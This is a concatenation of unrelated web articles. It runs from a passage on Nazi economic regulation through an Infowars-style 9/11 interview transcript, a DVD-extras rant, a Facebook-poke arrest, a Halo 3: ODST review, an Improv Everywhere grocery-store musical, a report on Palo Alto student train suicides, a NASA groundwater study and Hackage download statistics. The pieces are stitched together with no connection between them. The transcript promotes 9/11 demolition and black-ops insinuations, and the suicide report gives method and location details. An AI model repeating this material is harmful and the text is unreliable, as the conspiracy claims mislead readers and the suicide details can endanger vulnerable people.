The more urgent the financial demands of the State become , the stricter measures are taken by the State in order to compel these institutions to invest their funds as the State may wish . ”
Once the banks were forced wholly under the control of the government , they became the means by which all property became subject to the state :
“ The totalitarian State will not have an empty treasury so long as private companies or individuals still have ample cash or liquid assets .
For the State has the power to solve its financial difficulties at their expense .
The private banks themselves , the financial institutions which previously dictated the terms on which they were willing to lend money , have built up the system of siphoning off liquid funds .
This financial system is now utilized by the totalitarian State for its own purposes . ”
So it was for the stock market , which was regarded as a national asset .
Speculation was forbidden .
Public companies were entirely subject to bureaucratic rule .
Order replaced the old spontaneity , while speculation of the old sort became an entirely underground activity .
The largest companies did n’t entirely mind the course of events .
“ The disappearance of small corporations gives rise to a tendency among small investors not to risk their capital in new competitive enterprises .
The larger the big corporations grow and the closer they become connected with the State bureaucracy , the fewer chances there are for the rise of new competitors . ”
So too for insurance companies , which were compelled to buy government paper .
The Left , The Right an ... Llewellyn H. Rockwell Jr Best Price : $ 7.33 Buy New $ 40.00 ( as of 07:55 EST - Details )
The tendency toward ever more economic regulation resulted not in socialism as such but fascist planning .
“ The fascist State does not merely grant the private entrepreneur the right to produce for the market , but insists on production as a duty which must be fulfilled even though there be no profit .
The businessman cannot close down his factory or shop because he finds it unprofitable .
To do this requires a special permit issued by the authorities . ”
The national demand for “ stimulus ” replaced private decision making entirely , as businessmen were required to produce and avoid any economic downturns that might embarrass the state .
“ The Nazi government has expressly threatened the private entrepreneur with increased State coercion and reduction of personal rights and liberties unless he fulfills adequately the ‘ duty to produce ’ according to the State ’s demands . ”
But stimulus could not and would not work , no matter how hard the party officials tried , because the very institutions of private property and competition and all market forces had been overwritten .
“ The totalitarian regime has annihilated the most important conservative force of capitalism , the belief that private property ought to be a sacred right of every citizen and that the private property of every citizen ought to be protected .
Respect for private property has penetrated the spirit of the people in all capitalist countries .
It is the strongest bulwark of capitalism .
Fascism has succeeded in destroying this conservative force …
People still have to work for money and have to live on money incomes .
Possession of capital still provides income .
But this income is largely at the mercy of State bureaucrats and Party officials . ”
Reimann sums up : “ In Nazi Germany there is no field of business activity in which the State does not interfere .
In more or less detailed form it prescribes how the businessman may use capital which is still presumably his private property .
And because of this , the German businessman has become a fatalist ; he does not believe that the new rules will work out well , yet he knows that he cannot alter the course of events .
He has been made the tool of a gigantic machine which he cannot direct . ”
The regime also dramatically increased social and medical legislation , providing lifetime pensions to friends and conscripting doctors in the service of its dietary and medical goals .
Now , if any of this sounds familiar , it is because the principles of intervention are universal .
The Nazi regime represented not a unique evil in history but rather a now - conventional combination of two dangerous ideological trends : nationalism and socialism .
We know both all too well .
Books by Lew Rockwell
The Best of Lew Rockwell
The Best of Llewellyn H. Rockwell , Jr.
Nate Clark
We Are Change Minnesota
Wednesday , September 30 , 2009
Fox News Channel ’s chief political correspondent Carl Cameron shared his thoughts on a variety of issues including the attacks of 9/11/2001 with We Are Change Minnesota on September 14th , 2009 in the U.S. Senate office building .
Citing warnings by numerous foreign intelligence agencies , pre-9/11 warnings from Arizona FBI agent Kenneth Williams and stating quite plainly that , “ It ’s really hard to make the case that the buildings just imploded without some sort of an accelerant , ” Cameron said we ’re , “ right to bang the drum because we do n’t know , ” what really transpired on 9/11 and that , “ The unanswered questions are reasons to be skeptical . “
Sharing thoughts on how his reporting on the Israeli art student spy ring and executive assassination squads ( subsequently revealed by Sy Hersh ) have gone nowhere , he explained , “ There are bad guys in the government .
Black Ops and stuff does happen . “
He went on to share some insight into the inner workings of the news industry .
Despite repeated acknowledgment of the unanswered questions concerning the events of September 11th , 2001 , he declined to go on the record in support of a new investigation of 9/11 with the excuse that , “ every single thing I say has to go though media relations ” — referring to media relations as a , “ meat grinder . ”
An astute observer might wonder if media relations was involved or if he personally felt it appropriate as debate moderator to outright insult Ron Paul ’s electability — asking , “ Do you have any , sir ? “ during the 2008 Republican presidential debates .
Cameron , a notorious John “ Skull and Bones “ Kerry basher , seemed to revel in sharing an account of Nancy Pelosi calling Kerry a “ liar ” for having supported the trumped up claims that there were weapons of mass destruction in Iraq .
Considering how Cameron was also the source of the allegation that Sarah Palin thought that Africa is a country rather than a continent , it seems that character assassination may be the name of the game .
Ironically , the conversation concluded with a reference to his encounter with We Are Change New York last year when he listened to their concerns at length but offered little to none of his own thoughts on the matter .
He did , however , tip off the group to the nearby Phil Gramm .
“ Come on guys , that ’s Phil Gramm … why are n’t you busting his ass ? ”
He offered the following advice on confrontation :
Yeah , and I mean seriously , simply you guys help your own cause , and I ’m not saying you need to be rude to the people who are on your team , but if they tamp it down a little bit , I mean …
I got jumped in downtown New York by a bunch of 9/11 truthers and I talked with them for an hour and it ’s still out there on the web and the thing is if we ’d had a quiet conversation , they might ’ve actually gotten something out of me that would ’ve been better than me just telling them , “ I ’m not going to talk to you . ”
Let ’s hope more workers in the news industry do what they can to help expose the unanswered questions about 9/11 — if even to tip off the real reporters to opportunities to report on the “ real questions . ”
Transcript
[ Emphasis added ]
A d v e r t i s e m e n t
Cameron :
The thing is , you guys get painted as conspiracy nuts because some of the people do n’t actually spend the time to read the facts , and you can give a number of facts to realize that it ’s really hard to make the case that the buildings just imploded without some sort of an accelerant .
So , in the emphasis of [ inaudible ] the accellerant , it ’s a culprit .
The unanswered questions are reasons to be skeptical .
What the office holders ca n’t do lead to the conclusions … because they ’re office holders .
I mean there ’s politics [ inaudible ] and so raising …
You guys should n’t get painted as nutjobs because you ’re raising questions .
But some of the guys who are on 9/11 truth squads and stuff like that , they ’ll say shit that ’s so far out there that it undermines the questions .
( ARTICLE CONTINUES BELOW )
Anthony :
We just had one guy out …
We were just up there in New York and we had one of the guys — one of those same guys — comes in and disrupted William Rodriguez , you ’ve heard of him right ?
Cameron : Yeah .
Anthony : … Just comes in and totally interrupts the speech …
Adam : … goes on about aliens and reptiles and stuff — makes us all look like we ’re out of our minds , you know ?
Cameron :
The guys that I got my four part Israelis series on are serious , non-partisan government people , you know ?
They went out and whacked people on the other side of the presidents , Republican and Democrat , they do their job and then ..
Anthony : Whacked ?
Cameron : Yeah .
They do shit .
There are bad guys in the government .
Black Ops and stuff does happen .
I mean , you know , Jack Bauer is a fuckin ’ movie but it …
Twenty Four is a TV show but it ’s … but there are , it ’s based in some stuff that ’s not just imagination and it has to be that way .
I mean , it just has to be .
So , it was just recently revealed that Bush had authorized an executive order that essentially would ’ve taken Brown and Root guys and , the Black - uh , the Blackwell paid contractors overseas and turned them into hit men to go after Bin Laden .
Anthony : Do you mean Blackwater ?
Cameron : Blackwater …
Now here ’s the thing .
I reported that at the same time I reported the 9/11 stuff — that the president had signed an executive order that essentially would ’ve permitted the possibility of hit squads .
And , I put it out there .
Ah , it went absolutely nowhere .
Two years later a guy named Sy Hersch of the New Yorker wrote a very famous article about , “ Hey , you know what ?
Bush may have authorized hit squads . ”
No shit !
Told ya that after the attacks !
And everybody was like , “ Whoa , it must be true . ”
Now what happened was he signed an order that said , worse comes to worse , you walk into a bar and you see Bin Laden there at the corner of the table playing black jack , knife his ass in the back .
That ’s what they fuckin’ tell them .
Now , that ’s a lot different than …
Dude walks into the cafe for a cup of tea in Morocco .
He ’s got a beard and he ’s six foot three , so they zero in a satellite and they say , wow , he ’s a lot taller than everybody and they nuke the village .
It does n’t happen that way .
You know ?
I mean I have to explain this to people every day that how do they keep missing that .
You know ?
It ’s a good question .
You guys should be wondering , “ Why the fuck do you keep doing that ? ”
Well , there ’s a reason .
We see him in real time , thirty … from six miles up in a satellite .
By the time they launch the satellite from the gulf of Aden twelve hundred miles away , it takes a fuckin’ half an hour to get there .
He ’s long gone , and you kill a village worth of kids !
So , you know , you understand that .
But if you do n’t explain that to the average person who is just , you know , happy to keep listening , when I can see on TV that we know where he is …
Adam :
It ’s called moral hazard .
I mean , of course , the reasons on the surface are going to be justifiable and common sense , but it leads to this gray for them to exploit .
Cameron :
In addition to what I reported , we knew the day after 9/11 that the Russians had warned us .
The Russians had warned us of the attacks in September .
The French and the British had warned us of hijacking planes .
The Israelis and the Germans had n’t , had warned us of a plane attack on the World Trade Center — all in the preceding eleven months .
Now , you know , ninety nine times out of a hundred these warnings mean absolutely nothing .
But these were like six , specific , generalized things , and they did n’t check .
Now , I mean , I know you guys have done the research .
You know , you have the FBI agent down in Arizona who let out the whole freakin’ warning before it happened .
Adam : Is that O’Neil ?
Cameron : Yeah .
They ’re learning how to fly , they ’re coming down to flight schools in Florida and they ’re comin ’ out here in their crop dusters and everything else .
I mean , it was all there , but we ’re a big fuckin ’ country — we ’re a whole god - damn hemisphere !
You know ?
I mean , it got lost between the cracks .
And whether or not that was a deliberate conspiracy , or benign neglect or just rank government incompetence , you know , my feeling is you guys are right to bang the drum because we do n’t know .
And just as a journalist , I talked to George Bush personally after 9/11 .
I talked to Harry Reid and John Kerry personally after 9/11 .
All three of them said Saddam had weapons of mass destruction .
Anthony :
You personally did ?
Cameron : Yeah , all three of them .
Now , unbelievably enough , only two people in the entire Congress adamantly refused … said that that ’s not true .
Bob Graham , the former Democratic chairman from Florida of the intelligence committee who said there was no evidence , and Nancy Pelosi .
Nanci Pelosi at a dinner one night told me that John Kerry was a fucking liar because he never saw the evidence in the report because she had looked at it .
She was actually one of the ranking Democrats on the intelligence committee .
Now who could believe Nancy freakin’ Pelosi ?
She ’s from San Francisco , you know , she ’s a pacifist .
But those other two who said adamantly I ’ve looked at every page , all the information and it ’s just not there , and she outed Kerry who was running for president at the time .
So …
Adam :
We ’ve actually got a DVD a buddy of mine made — a film called Core of Corruption , a five part film , they ’ve released the first part so far .
He could write a book on Bob Graham alone but it features Bob Graham in there and the dirt we ’ve got on him .
But ah , also with regards to whether or not the intelligence muck - up , and you know , incompetence , or whether there might be direct , uh , involvement , something that really bothers us is the Able Danger program and I was wondering you have any thoughts on that .
Cameron : No . I mean , there ’s always the concern that you ’re going to run into people who are not following real questions .
There are questions that have yet to be answered .
It does n’t make sense , that the President of the United States or the Congress of the United States will willfully lie to hurt Americans for the purposes of reelection or economic downturn — that ’s a bridge too far .
I can understand how people who are informed might be able to make that leap , but it undermines a valid pursuit of facts when you go too far to prove a point .
It ’s like , I do n’t know if you guys have kids or anything , but you see a little kid throw a fucking tantrum in the grocery store because they want a box of milk .
They ’re not going to get it — they ’re going to get locked in the back of the car and slapped .
You know , it ’s , it ’s …
Adam :
Well , just like the town hall meetings .
We ’re always given grief because , you know , they think that we ’re the ones that are shouting people down with the health care and we have nothing to do with it .
We ’re always the ones coming out patiently trying at a level volume voice , right , asking questions about these issues and you get these morons out there screaming and crying exactly like that — like a child , and we get pushed into that category .
Cameron : Yep .
My whole point of view is to point out that there are unanswered questions , and some of it has been answered , but a lot of it has n’t been .
Anthony :
One thing that really scares me about that is say that this happened on purpose , or something like that , that it would be slowly [ inaudible ] and things like that and not just …
Cameron : Right , I mean , and here ’s the other thing that you gotta remember too .
Israel has been known as the country that spies on the United States more than any other .
Now it ’s not , it ’s not national security spying , it ’s mostly economic .
They want to know what to do to make money and how things are going .
[ Carl agrees to a photo with a fan … ]
Cameron : Frankly , I ’ve been disengaged with a handful of time of you guys who sort of come and try to bust me on street corners and stuff like that .
The truth is I have not been involved in the national security stuff since , like , after the beginning of the war in 2002 .
Adam : Sure .
You ’ve got a job to do and they ’re going to assign you to different things , and …
My question is , you know , I do n’t want to get you in trouble or anything like that .
I you ’re willing we ’d like to get you just on the record for our web site , would you support a new investigation ?
Cameron : Oh , I can ’t .
There ’s no way .
I can’t , I mean that ’s the kind of thing where if I were to do that , it ’s not going to get … it ’s such a hassle for not having gone through media relations .
It ’s not a question of content , um , but every single thing I say has to go though media relations and that ’s simply not …
I ca n’t do interviews without …
I can’t , I ca n’t do interviews with like mainstream political magazines until it ’s gone through that meat grinder .
So …
Anthony : Mainly we saw you and we just wanted to say thanks .
You did a good job even though you …
Cameron :
Thanks very much — I appreciate it .
Yeah , and I mean seriously , simply you guys help your own cause , and I ’m not saying you need to be rude to the people who are on your team , but if they tamp it down a little bit , I mean …
I got jumped in downtown New York by a bunch of 9/11 truthers and I talked with them for an hour and it ’s still out there on the web and the thing is if we ’d had a quiet conversation , they might ’ve actually gotten something out of me that would ’ve been better than me just telling them , “ I ’m not going to talk to you . ”
This article was posted : Wednesday , September 30 , 2009 at 11:52 am
Print this page .
Infowars.com Videos :
Comment on this article
You turn on the TV .
You settle to watch whatever favorite show you want to rot your brain on .
The commercials come on .
AND NOW AVAILABLE ON DVD !!!
Some movie you saw in the theatre 5 months ago !
Go buy it now !
You get a 2 - disc special edition directors cut unrated super awesome 10 % more absorbent with novelty item such as book ends , a plush doll and a copy of one of the frames from the film for the low price of your dignity !!
That ’s right , DVD releases .
I have no problem with movies being released onto whatever movie format is current .
VHS , DVDs , Blu - Ray , Beta Max , AVI , whatever .
What I have a problem with is how they are adding a bunch of extra features and deleted scenes .
Extra features are great … but how many times do you actually look at them ?
Not often is my guess .
I have looked at the ‘ special feautres ’ on a few DVDs I own , and really , they are all crap .
Things like pictures from the movie , ‘ The Making of … ” commentaries , so on and so forth .
Now I ’m pretty sure some of you like those sorts of things , but some of you also think the sun orbits the earth .
What ’s worse than special features , is the deleted scenes extra they add .
A deleted scene is n’t usually deleted because it ’s the best thing ever !
It ’s deleted because it is sub-par , adds little to the story , and generally wastes a minute of your life .
Also a lot of DVDs have the deleted scenes as something you watch separate from the movie .
Which means if you have a short attention span ( most of you humans ) , then it will be out of context , or wo n’t be as interesting .
Some movies do give you the option to include the deleted scenes while watching the movie .
They ’ll do one of two things .
Expand the story giving you more insight into what is going on ( doubt it ) .
Or add scenes you probably wo n’t remember being excluded from the movie in the first place .
The worst offenders of the deleted scene additions is the movie companies that release a DVD with ALTERNATE ENDINGS !
The movie was released into the theatre with ONE ending .
Hopefully the BEST ending .
I still find it amazing that a movie would have different endings to pick from .
Generally I am going to buy a movie if I liked it .
If I liked it , then why would I want to see an alternate ending ?
I liked the ending I saw .
You do n’t see any other media that purveys a story having alternate endings .
You do n’t see the book ‘ To Kill a Mockingbird ’ being released with alternate endings .
You do n’t see magazines release articles with different endings .
The stories inscribed on the walls of the pyramids have no alternate endings !
What was really bad was some horrible B movie I saw on DVD that had at least EIGHT alternate endings !
YES EIGHT !
it was almost the most retarded thing I ’ve seen on DVD .
That fact , and that it was a horrible movie made me completely forget what it was called … but shit , 8 endings ?
It ’s like choose your own adventure for movies .
Except you do n’t get to choose your own adventure , you get to watch a movie , and see other things the director thought would be better than the original ending because he wanted to show off that his director lessons were worth it so there !
So when you buy a new DVD , what you get is a movie you enjoyed , wrapped in a steaming pile of poo .
Sometimes with a side of alternate poo .
Pro tip : Watching alternate endings gains you diddly and squat .
Fun Fact : Hitler wanted an alternate ending to things , and you see how that turned out .
Beware : a Facebook poke could land you behind bars .
Just ask Shannon D. Jackson of Hendersonville , Tennessee , who faces that very real possibility .
Jackson was arrested and transported to Sumner County Jail on September 25th with a bond set at $ 1,500 after she violated an order of protection by allegedly poking a woman on Facebook .
The alleged poke broke the terms of the court order : " no telephoning , contacting or otherwise communicating with the petitioner . ”
If found guilty , Jackson could face some more extended jailtime : a possible 29 days in jail and a fine of up to $ 2,500 .
The Tennessean writes :
According to the affidavit filed in Sumner County General Sessions Court , Jackson is accused of using the “ poke ” option on Facebook to contact a Hendersonville woman , thus violating the terms of the order of protection ...
Hendersonville police have made copies of the page in which the alleged victim is shown to be “ poked , ” according to the affidavit .
While the story seems unbelievable at first glance , the logic is impeccable : poking a person on Facebook is indeed a means of communication , no matter how subtle .
What do you think ?
Is poking off - limits in this case ?
[ Image Credit : Corey Leopold ]
The Master Chief finished the fight in 2007 , so what can players possibly expect to get out of anything that does n’t bear the title ‘ Halo 4 ’ ?
Microsoft and Bungie are willing to bet quite a lot .
Halo 3 : ODST puts you into the shoes of an ODST ( Orbital Drop Shock Trooper ) Rookie in search of his squad mates .
Set in the same time frame as Halo 2 , the game chronicles the saga of a group of soldiers who are willing to risk everything to figure out the mystery of New Mombasa .
So That ’s What Happened …
Just a quick overview so do n’t worry about reading spoilers .
The game starts off with an uninvited ONI ( Office of Naval Intelligence )
Officer joining your squad just before deployment .
Her codename is ‘ Dare ’ and she ’s sporting the coveted and ever so sexy Recon armor .
Now , there ’s nothing wrong with her joining the group except she brings with her some last minute change of plans that you , the Rookie , and the rest of the Hell - Jumpers are completely unaware of .
After a tiny scuffle about what exactly is going on between her and your squad leader ‘ Buck ’ , you gear up , enter your HEV ( Human Entry Vehicle ) , and prepare to drop !
What follows has to be one of the most impressive and engaging cut - scene in all of the Halo games .
I ’d go into detail about it but I would rather you experience it for yourself .
Once you “ land ” on Earth , you realize that you ’re all alone .
Lost and a bit confused , you ’re forced to the traverse the dark and moody streets in search for clues as to where the rest of your gang may be and why on earth your mission to repel invading aliens has taken such a drastic detour .
After locating each clue , you ’ll trigger a cut - scene then play as that character to reveal what exactly happened .
Where Do I Go !?
I Do n’t Even …
New Mombasa serves as a Hub world that you ’re able to navigate within a confined space that eventually opens up as the story unfolds .
If you get lost your HUD ( Heads Up Display ) will always indicate where you have to go .
If that is n’t enough , there are Link stations that you can interact with and when you do , you link in with your new AI buddy that goes by the name of SuperIntendent .
He will help you along the way by giving you signals as to where to go .
The signs are subtle so be sure and pay attention !
He wo n’t only tell you where to go ; he ’ll also alert you to nearby Covenant patrol groups that may be nearby .
In addition to the SuperIntendent , you also have a Navigational Map that will show you your location and special points of interest .
All you have to do is press the Back button .
You can place markers to those points of interests and they ’ll appear in your HUD so you wo n’t have to navigate back and forth .
Once you get to where you have to be , check your HUD for a special blue indicator just below your health .
If you stray too far off , the blue indicator will disappear ; letting you know you ’ve left the beacon area .
Now you must find the clue to trigger the flashback .
If You Think You Can Just Waltz In Here …
You have to be careful when you ’re out and about in the streets .
The Covenant is patrolling the area and they ’re looking for trouble .
You might think you have what it takes to easily take on a pack of Brutes but you have to remember that you ’re no longer a Spartan with MJOLNIR armor .
They will give you problems .
The game play mechanics are essentially the same .
There are subtle differences that you will have to get used to .
For example , if you were amazingly accurate with plasma grenades or spike grenades in Halo 3 , you ’re going to have trouble adjusted to the differences between the two .
For some reason , the ODST ’s throw farther and with less arc .
Do n’t ask me .
I just live in this world , I did n’t make it .
I also noticed a slight increase in speed and less height in jump .
These small differences will throw you off at first but will all be forgotten after a few battles .
There are a couple of revamped weapons that will help you along the way .
The Halo 1 pistol is back and it is a beast .
The only downside to it is the really big recoil that comes after every shot .
But it ’s as fast as you can pull the trigger .
Another addition is the silenced SMG that was not so fun in Halo 2 .
Its range along with its accuracy has increased and is a little more full - filling in close to mid-ranged combat .
These weapons will assist you along the way and put the battles in your favor … some of the time .
The bigger , tougher enemies like Brute Chieftains or Hunters are as tough as nails and even a season veteran like myself had so many problems going up against them on Heroic .
The game has epic battles that you ’ll want to replay over and over again and the journey to discovering the mysteries of what happened is a somewhat short but very pleasant one .
The only small little downfall in game play was that , at times , it became a bit repetitive .
A couple of mission had you holding down a specific point until all the enemies were eliminated .
The good thing about that was that they mixed it up enough so that it did n’t become annoying .
They made enough changes to keep it fresh enough as to not make it a hassle , in fact , they made it fun .
Wait , Can You Hear That ?
Once again Marty O’Donnell blows us away with his musical splendor and ability to immerse us into the game .
Every time his music plays , the tone and pace of it will let you know what you ’re in for without giving away too much .
Even though you ’ll always hear when it kicks in , it ’s not intrusive at all and serves to tighten up your senses .
The noir feel that he was going for is definitely felt as you make your way through the city streets .
The voice acting is top - notch with a number of high profile actors from the show Firefly .
The sounds of the weapons are familiar so if you ’ve played the previous games you ’ll know what you ’re in for .
This will help you strategize and think twice about what move you ’re going to make because of the weapon that the enemy carries .
The dialogue within the game has always been considered high - end .
The Halo fans have come to know and love hilarious one - liners from friends and foes alike and there is a lot of that in ODST so keep an ear to the ground for them .
Relax , Old Friend .
You ’ve Done Enough …
If you did n’t already know , Halo 3 : ODST came out 2 years after the release of Halo 3 .
Bungie worked long and hard for an entire year to complete this game and ship it out to stores .
The reason why it took so little time to ship out a full game is because Halo 3 : ODST is running off of the Halo 3 engine .
The game is visually amazing even though it ’s not ground breaking .
If you ’re expecting Gears of War 2 graphics , you will be disappointed .
That ’s not to say ODST does n’t look impressive .
The lighting in the game is one of the best out there this generation .
There was this one instance where you ’re driving down a road and enter this building where there is a Ghost dead center .
As you get close , you see all the lights in the building reflecting off the vehicle ’s shiny purple body .
As I hopped in and sped away , every light I passed gleamed off my shiny new ride .
Dynamic lighting at its best !
The cut - scenes in the game were a tad short of amazing .
The engine still has no anti-aliasing and that hurt the cut - scenes a bit but not enough to warrant a bad grade or lower the score .
The cinematics were truly impressive and at times awe - inspiring .
Bungie hit it out of the park in this department .
The animation and environments were not left behind either .
Both appear to be vastly improved over Halo 3 and they look great .
The art direction that they have taken with ODST is new yet familiar .
There ’s a hint of Forerunner architect in the building designs in New Mombasa and when you notice the little designs here and there throughout the buildings , you ’ll remember what Guilty Spark told you at the end of Halo 3 just before you blew him into oblivion .
The art direction and cut scene were definitely the show stoppers with every thing else coming in close .
It was a great engine .
Now we must say goodbye and REACH for the sky .
But Wait !
There ’s More !
Once you ’re done with the campaign , do n’t even think about popping in the second disk that includes the Complete Halo 3 Multiplayer Experience ™ with the 3 new exclusive maps .
You ’re not done in New Mombasa .
Play through it to get the Vidmaster Achievements to unlock the ever so coveted Recon Armor ( this is assuming you got them for Halo 3 ) .
In addition to that , all of the doors open up in New Mombasa so you can roam freely and find all of the audio - logs for the secret side - story of Sadie .
There ’s still Firefight too which was previewed here .
If you think Halo 3 : ODST is not worth the price of admission , I ’m going to respectfully disagree .
There ’s so much replay value packed in to this meaty “ expansion , ” it ’s insane .
Open world environment to explore , skulls to find , audio logs to discover and last but not least , Firefight !
Go out and get this game , folks .
You ’ll be entertained for months on end .
And with that , the wait for Halo : Reach begins .
Adios !
For our latest mission , six undercover actors burst into song in a grocery store in Queens .
Three minutes and lots of silly choreography later , they returned to their roles as shoppers and stock boys .
The mission was filmed with hidden robotic , lipstick , and wearable cameras .
Enjoy the video first and then go behind the scenes with our report below .
We had a couple of really excellent hidden camera reaction interviews that got cut from the final video .
I put them together in an outtake video :
We ’ve been wanting to stage a follow up to our Food Court Musical mission for quite some time .
Unfortunately , we ’re not able to produce a musical like that without some serious help in the budget department .
( Food Court Musical was produced for a TV pilot . )
Last month Trident Layers expressed interest in sponsoring an Improv Everywhere event ( giving us creative control and using no product placement ) , and I knew this would be a great opportunity to create a new public musical .
Agent Brown rehearses with Agents Kayne and Rustin
I knew from the start that in order to make a worthy follow up to Food Court Musical , I would have to use the same songwriting team , Scott Brown & Anthony King .
Not only are they longtime Improv Everywhere Agents , they ’re also the authors of the hit Off - Broadway musical , Gutenberg !
The Musical ! .
Their songs , both catchy and hilarious , have been stuck in my head for many a sleepless night .
The cast rehearsing
The cast were all actors I knew from the Upright Citizens Brigade Theatre .
We had to cast people who could really sing well , given the “ slow jam ” nature of the song .
We had a rehearsal at a Manhattan studio where Agent Brown taught them the song , and Agent King worked on the choreography .
Rehearsing in the store
The next night we had a rehearsal in the grocery store itself .
The store was part of a small chain called “ Best Yet ” and was located in Astoria , Queens .
We chose it for its enormous size , at least by New York standards .
Our rehearsal was late at night , right before the store closed .
There were very few people shopping at that hour , so we would n’t get a real sense of how crowded the produce section would be until the actual mission the next day .
We worked with the store and got permission , enabling us to set up hidden cameras .
We used some incredible robotic cameras that were operated via joystick in the control room in the back .
The control room
Speakers
We had planned to just use the store ’s PA system to play the song .
At the dress rehearsal we learned that grocery store speakers sound awful when the volume gets cranked up .
The bass turned to fuzz .
So we hid some additional speakers under the muffin table to give their system a boost .
In addition to the robotic cameras hidden on high ledges and in security domes , Agent Adams had a couple of camera rigs he could control out on the floor .
We put a lipstick camera on the end of a cart and filled it with groceries .
He was able to push it around the area while watching what he was filming on a little monitor .
Agent Adams also had a hidden camera in the strap of his bag , getting a great POV shot of anyone he talked to .
His main job was to get reactions from shoppers after the musical ended .
He wore a hidden microphone and also wore an earpiece , enabling me to talk to him from the control room and say things like , “ Try to get the woman you ’re talking to to turn around ; we ’re only seeing the back of her head . ”
Control room monitor
We staged the mission a few times throughout the day to make sure we got the best possible take and camera coverage .
The first take started around 1 PM .
The first few moments were always hilarious .
As soon as Agent Kayne started in with his “ No , no , no ’s , ” heads began to turn .
When we did Food Court Musical , we had a pretty good idea of where our audience would be– sitting at the tables .
This was more unpredictable .
We had all of this choreography planned , but we had no idea if people would make way for us .
The area got increasingly crowded as the day went on , which made it all the more fun .
Often people found themselves right in the middle of the show .
A woman laughs as Agent Johnson passes with his basket
The woman above took her cart right through the center just as the chorus began .
It was like she was a part of the choreography .
Agent Scott ’s character was pregnant ; she was not .
We used a fake belly .
She had shoppers coming up to her before and after the song asking when she was due , etc .
Agent Fernandez helps a customer find an item from the circular
Agents Brown and Fernandez played the two stock boy characters .
This meant they spent most of the day walking around the floor in the store ’s uniform .
Of course they were constantly being stopped by customers asking for help .
Our musical was staged very close to the front door , so lots of folks would walk in mid-song .
It was fun to see their reactions as they entered and were immediately confronted by our ridiculousness .
We got so many wonderful reactions from everyone in the store throughout the afternoon .
Queens is the most diverse county in the entire world , and it was really wonderful seeing all of the different types of people laugh and smile .
Letting a friend on the phone listen in
This guy was particularly excited ( as seen in the video )
There was always a nice crowd near the registers looking over
The musical got even more absurd when Agent Brown carted Agent Fernandez down the aisle .
Agent Fernandez delivered his passionate speech into a price gun , and the two starting spinning while the rest of the cast circled them , building up to the finale .
Before the shoppers could finish applauding , our actors were back to normal life .
Those playing customers went back to shopping and those playing stock boys got back to work .
Agent Brown prices some fruit
Mission Accomplished .
OTHER RESOURCES :
– Many more photos in higher resolution : Agent Sokoler ’s Flickr Set
– Our first musical : Food Court Musical
– Our third musical : I Love Lunch !
The Musical
– Buy the original cast recording of Gutenberg !
The Musical , also by Brown & King .
For the fourth time in less than six months , a student from one Palo Alto high school has committed suicide , authorities say .
The boy stepped in front of a train at the same location where three other students have killed themselves since May .
CalTrain spokeswoman Tasha Bartholomew said the latest suicide of a student from high - performing Gunn High School occurred at 10:50 p.m. Monday .
Another Gunn student , a boy , 17 , killed himself the same way at the same spot at 8:20 a.m on May 5 .
His death was followed by the suicide of a girl , 17 , on the tracks at 9:59 p.m. on June 2 .
The third suicide occurred at the same location on Aug. 21 at 10:45 p.m .
Palo Alto police told the San Jose Mercury News that police are limiting publicity about the suicides for fear of a growing cluster .
" The research we 're being told is that the more we talk about it and romanticize it , the easier it is that mentally ill or depressed people will make that leap , '' Sgt. Dan Ryan was quoted as saying .
" We 're taking a stand and not releasing more information . "
Using satellite data , UC Irvine and NASA hydrologists have found that groundwater beneath northern India has been receding by as much as 1 foot per year over the past decade – and they believe human consumption is almost entirely to blame .
More than 109 cubic kilometers ( 26 cubic miles ) of groundwater disappeared from the region 's aquifers between 2002 and 2008 – double the capacity of India 's largest surface - water reservoir , the Upper Wainganga , and triple that of Lake Mead , the largest manmade reservoir in the U.S .
People are pumping northern India 's underground water , mostly to irrigate cropland , faster than natural processes can replenish it , said Jay Famiglietti and Isabella Velicogna , UCI Earth system scientists , and Matt Rodell of NASA 's Goddard Space Flight Center .
" If measures are not soon taken to ensure sustainable groundwater usage , consequences for the 114 million residents of the region may include a collapse of agricultural output , severe shortages of potable water , conflict and suffering , " said Rodell , lead author of the study and former doctoral student of Famiglietti's at the University of Texas at Austin .
Study results will be published online Aug. 12 in the journal Nature .
Groundwater comes from the percolation of precipitation and other surface waters down through Earth 's soil and rock , accumulating in aquifers – cavities and layers of porous rock , gravel , sand or clay .
In some subterranean reservoirs , the water may be thousands to millions of years old ; in others , water levels decline and rise again naturally each year .
advertisement
Groundwater levels do not respond to changes in weather as rapidly as lakes , streams and rivers do .
So when groundwater is pumped for irrigation or other uses , restoration of original levels can take months or years .
" Groundwater mining – that is when withdrawals exceed replenishment rates – is a rapidly growing problem in many of the world 's large aquifers , " Famiglietti said .
" Since groundwater provides nearly 80 percent of the water required for irrigated agriculture , diminishing groundwater reserves pose a serious threat to global food security . "
Data provided by India 's Ministry of Water Resources had suggested that groundwater use across the nation was exceeding natural replenishment , but the regional rate of depletion had been unknown .
In the new study , the hydrologists analyzed six years of monthly data for northern India from twin satellites called GRACE – NASA 's Gravity Recovery and Climate Experiment – to produce a chronology of underground water storage changes .
GRACE detects differences in gravity brought about by fluctuations in water mass , including water below the Earth 's surface .
As the satellites orbit 300 miles above Earth , their positions change – relative to each other – in response to variations in the pull of gravity .
They fly about 137 miles apart , and microwave ranging systems measure every microscopic variance in the distance between the two .
" With GRACE , we can monitor water storage changes everywhere in the world from our desk , " said Velicogna , also with NASA 's Jet Propulsion Laboratory .
" The satellites allow us to observe how water storage evolves from one month to the next in critical areas of the world . "
Groundwater loss in northern India is particularly alarming because there were no unusual trends in rainfall – in fact , it was slightly above normal during the study period .
The researchers also examined data on soil moisture , lake and surface reservoir storage , vegetation and glaciers in the nearby Himalayas to confirm that the apparent groundwater trend was real .
The only influence they could n't rule out was human .
" For the first time , we can observe water use on land with no additional ground - based data collection , " Famiglietti said .
" This is critical because in many developing countries , where hydrological data are both sparse and hard to access , space - based methods provide perhaps the only opportunity to assess changes in freshwater availability across large regions . "
About GRACE : The Gravity Recovery and Climate Experiment is a partnership between NASA and the German Aerospace Center .
The University of Texas Center for Space Research , Austin , has overall mission responsibility .
NASA 's Jet Propulsion Laboratory developed the twin satellites .
The German Aerospace Center provided the launch , and GeoForschungsZentrum Potsdam , Germany , operates GRACE .
Back in March , I crunched the web logs for the Hackage package server ( kindly hosted by Galois ) to measure for the first time how popular Haskell packages were Hackage .
4 months later , I ’ve rerun the numbers , and have some new data .
Headlines
Total Hackage downloads : 1.13 million
Total Packages on Hackage : 1470
Total Contributors : 400 developers
Top 20 Haskell applications
xmonad – A tiling window manager cabal - install – The command - line interface for Cabal and Hackage .
